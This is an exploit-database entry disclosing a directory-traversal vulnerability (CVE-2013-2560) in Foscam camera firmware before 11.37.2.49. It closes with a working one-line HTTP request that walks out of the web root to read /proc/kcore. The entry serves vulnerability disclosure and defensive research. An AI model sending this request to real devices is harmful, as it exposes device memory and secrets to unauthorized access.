Foscam < 11.37.2.49 - Directory Traversal

Author: Frederic Basse
type: remote
platform: hardware
port: 
date_added: 2013-03-01 
date_updated: 2015-09-30 
verified: 1 
codes: CVE-2013-2560;OSVDB-90821 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/58290/info

Foscam is prone to a directory-traversal vulnerability.

Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to retrieve arbitrary files in the context of the application. This may aid in further attacks.

GET //../proc/kcore HTTP/1.0